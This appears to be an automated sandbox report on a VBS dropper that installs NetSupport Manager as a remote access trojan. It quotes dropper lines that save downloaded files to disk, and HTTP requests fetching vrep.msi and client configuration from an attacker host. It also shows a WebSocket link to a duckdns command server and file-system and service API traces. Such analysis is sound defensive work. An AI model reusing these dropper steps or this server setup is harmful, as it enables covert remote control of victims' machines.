                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb( source: client32.exe, 00000026.00000003.2701499634.0000000004EEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: psapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernelbase.pdb( source: client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\dll\wkernelbase.pdb1} source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wtsapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wmiclnt.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comctl32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: crypt32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemprox.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: crypt32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: z:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: x:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: v:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: t:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: r:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: p:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: n:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: l:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: j:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: h:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: f:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: d:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: b:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: y:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: w:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: u:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: s:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: q:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: o:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: m:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: k:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: i:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: g:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: e:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: c:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: a:
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B280C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,28_2_00B280C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B24AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,28_2_00B24AF0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B10C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,28_2_00B10C40
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B255D0 _memset,FindFirstFileW,FindClose,28_2_00B255D0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,28_2_00B0FD80
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,28_2_00B0FE18
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,28_2_00B2BE60
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004980C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,30_2_004980C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00494AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,30_2_00494AF0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00480C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,30_2_00480C40
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004955D0 _memset,FindFirstFileW,FindClose,30_2_004955D0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,30_2_0047FD80
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,30_2_0049BE60
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,30_2_0047FE18
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001A0C40 _wcsrchr,FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,32_2_001A0C40
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,32_2_001B80C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,_wcsrchr,FindFirstFileW,FindClose,_wcsrchr,CopyFileW,32_2_001B4AF0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B55D0 _memset,FindFirstFileW,FindClose,_wcsrchr,32_2_001B55D0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019FD80 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,32_2_0019FD80
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019FE18 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW,32_2_0019FE18
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,32_2_001BBE60
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 176.126.113.166 443Jump to behavior
                                Enables network access during safeboot for specific services
                                Source: C:\Windows\Installer\MSI3FCC.tmpRegistry value created: NULL Service
                                Potential malicious VBS script found (has network functionality)
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBodyJump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile nsmFile, 2Jump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBodyJump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile clientFile, 2Jump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBodyJump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile targetFile, 2Jump to dropped file
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: megaeth1337.duckdns.org
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49832
                                Source: global trafficTCP traffic: 192.168.2.4:49832 -> 185.170.144.66:1773
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: SAARGATE-ASVSENETGmbHDE SAARGATE-ASVSENETGmbHDE
                                Source: Joe Sandbox ViewASN Name: VDWELLEREE VDWELLEREE
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /choh/NSM.lic HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/Client32.ini HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/vrep.msi HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /choh/NSM.lic HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/Client32.ini HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/vrep.msi HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: 9Bnq7QJqg8kCGoqK+ufHdg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficDNS traffic detected: DNS query: okolinabeauty.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: global trafficDNS traffic detected: DNS query: megaeth1337.duckdns.org
                                Source: client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmpString found in binary or memory: ftp://http://HTTP/1.0
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://%s/favicon.icoshcore.dllGetDpiForMonitorPCI
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: pcicfgui_client.exe, 00000024.00000002.2676926399.000000006B852000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://62.172.138.12/url_redirect.htm#The
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DFA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
